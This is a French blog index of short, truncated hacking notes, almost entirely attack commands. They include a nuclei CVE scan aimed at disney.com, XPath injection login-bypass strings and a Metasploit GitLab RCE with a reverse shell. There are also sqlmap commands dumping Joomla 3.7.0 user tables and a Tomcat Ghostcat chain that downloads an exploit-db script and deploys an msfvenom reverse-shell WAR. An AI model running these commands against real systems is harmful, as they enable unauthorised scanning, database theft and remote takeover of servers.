Notes pour trouver des failles de sécurité

subfinder -d disney.com -silent -all À httpx -silent -threads 100 | nuclei -id CVE-2022-26138 -v fuxploider : file upload vulnerability scanner and exploitation tool ————————————— If you want to bypass endpoint always to use own methodology. Example: Http Header based bypass: 1. X Original URL: /redact Example: GET /api/getUser HTTP/1.1 -> 403 Host: redact.com GET … Continuer la lecture

Analyse de virus de façon sécuritaire

Créer une machine virtuelle sous Windows 10. Créer une machine virtuelle Windows avec au minimum 60 giga octets. Pour télécharger une version d’essai de Windows. Téléverser le iso dans votre Datacenter. Lier votre fichier iso à votre lecteur cdrom de la machine virtuelle. Procéder à l’installation habituelle de Windows. Désactiver windows defender de façon permanente … Continuer la lecture

XPATH vulnérabilité

On puet essayer d’entrer comme ceci nom et n’importe quoi comme mot de passe x" or 1=1 or "a"="a x' or 1=1 or 'a'='a https://owasp.org/www-community/attacks/XPATH_Injection https://book.hacktricks.xyz/pentesting-web/xpath-injection https://medium.com/@shatabda/security-xpath-injection-what-how-3162a0d4033b

Exploit GitLab RCE

IL existe certaines versions de GitLab Community Edition Vulnerable. Par exemple, la version 12.8.1 est vulnérable use exploit/multi/http/gitlab_file_read_rce set rhosts 10.9.0.69 set rport 443 set vhost git.searchevolution.com set username r0cker set password blabla set ssl true set lhost 10.9.0.60 exploit bash -i Par la suite, on est dans un shell, mais nous ne pouvons faire … Continuer la lecture

Wireshark et clé de décryption ssl.txt

Par exemple on retrouve un fichier ssl.txt contenant CLIENT_RANDOM 432738e149bdfb67ce70ca989045c1f2f7589d688e81c327c57f38e1ed457295 ee0b404dfdb59ecdcb0c12dd5a821060b2f9934bae9c1775509a10a1d74f6a9436f5246233ed71164a9a7e017d417afa CLIENT_HANDSHAKE_TRAFFIC_SECRET ecd91572d3cead7a6fe73f1427bdf8d8dc434cff3e4f7392c3ad0a37d368de32 e9f0289a01cacc61add59eedc828b5a91ee98bcf34c52123209d3ca9d4170d77 SERVER_HANDSHAKE_TRAFFIC_SECRET ecd91572d3cead7a6fe73f1427bdf8d8dc434cff3e4f7392c3ad0a37d368de32 a60084872c3de44f6e427c664406e24225d6a2f54a542766a372d57151975e6d CLIENT_TRAFFIC_SECRET_0 ecd91572d3cead7a6fe73f1427bdf8d8dc434cff3e4f7392c3ad0a37d368de32 b43bb936824ff4a73009ddac4a85c12e055dbbafa001a084aeb06b1a521cb18c SERVER_TRAFFIC_SECRET_0 ecd91572d3cead7a6fe73f1427bdf8d8dc434cff3e4f7392c3ad0a37d368de32 00085b37bef7ca53b2b71785556b32fdf1207cc77efa8d164bcad92bb628c693 EXPORTER_SECRET ecd91572d3cead7a6fe73f1427bdf8d8dc434cff3e4f7392c3ad0a37d368de32 e17b06f96a89a5703bbc7668c60c03422d05a8822cebc339135c459c33272abc CLIENT_HANDSHAKE_TRAFFIC_SECRET ecc7a6a912384c9160811b984e55cfdc9de698417c17b78b816d6b524278d2d4 5e5779e10ca7e9ae486d4e8644d2ad6603d8ae3215d647833295a9bee362982f SERVER_HANDSHAKE_TRAFFIC_SECRET ecc7a6a912384c9160811b984e55cfdc9de698417c17b78b816d6b524278d2d4 70cd3d7ad0d317b857ae0f496af7de44cc06614969ca836690e149d10994c8d7 CLIENT_TRAFFIC_SECRET_0 ecc7a6a912384c9160811b984e55cfdc9de698417c17b78b816d6b524278d2d4 d91ae414d06aa79e3e2f6bf8d61c65bac83e456060c3b407dba9e2bbdb28ec12 SERVER_TRAFFIC_SECRET_0 ecc7a6a912384c9160811b984e55cfdc9de698417c17b78b816d6b524278d2d4 e09758821d5fa4a72c6e9640bf35b82eb0f7e2e99ac3f1654b0b5daa9943bd1e EXPORTER_SECRET ecc7a6a912384c9160811b984e55cfdc9de698417c17b78b816d6b524278d2d4 176ba414e1ac9c60a52bda4105e6fbd895dbb1b11f03b9dcd658661ac4ac358f CLIENT_HANDSHAKE_TRAFFIC_SECRET c58b0b0450b83f787125c01c8c75082eb7462a7a2cc376014a84b47d9919b3d2 be84a5fcc04fc7fa8b9affc084cc6196d9e9dffbee7561b5f3139e641fb75996 SERVER_HANDSHAKE_TRAFFIC_SECRET c58b0b0450b83f787125c01c8c75082eb7462a7a2cc376014a84b47d9919b3d2 8175446c4375095926b09edf66bcd81f76e6f3321c525454ba4d6357bb3840ec CLIENT_TRAFFIC_SECRET_0 c58b0b0450b83f787125c01c8c75082eb7462a7a2cc376014a84b47d9919b3d2 f901b6d144c94ff7f64e444e56fdf7aeee38142ff474126df6d5609ed912d5b6 SERVER_TRAFFIC_SECRET_0 c58b0b0450b83f787125c01c8c75082eb7462a7a2cc376014a84b47d9919b3d2 0a077ed44185f451015e2e33c4bd25ca1ee0990c0d4c8b91ece32d57b1104c10 EXPORTER_SECRET c58b0b0450b83f787125c01c8c75082eb7462a7a2cc376014a84b47d9919b3d2 … Continuer la lecture

Joomla 3.7.0 exploit

sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' –risk=3 –level=5 –random-agent –dbs -p list[fullordering] sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' –risk=3 –level=5 –random-agent -D joomladb_found –tables -p list[fullordering] sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' –risk=3 –level=5 –random-agent -D joomladb_found -T 'table_found' –columns -p list[fullordering] sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' –risk=3 –level=5 –random-agent -D joomladb_found -T 'table_found' -C username –dump -p list[fullordering] sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml'–risk=3 –level=5 –random-agent -D joomladb_found … Continuer la lecture

Hack tomcat

Il existe une vulnérabilité dans Tomtom et le service AJP (ghostcat). Ce service est un protocole différent pour accéder à l’interface administrateur. wget https://www.exploit-db.com/download/48143 python2 48143.py  10.10.151.49 #on retrouve un utilisateur et mot de passe. msfvenom -p java/shell_reverse_tcp lhost=10.9.0.60 lport=4444 -f war -o pwn.war curl -u user_found –upload-file pwn.war http://10.10.151.49:8080/manager/text/deploy?path=/shell  #il y a aussi la possibilité d'uploader … Continuer la lecture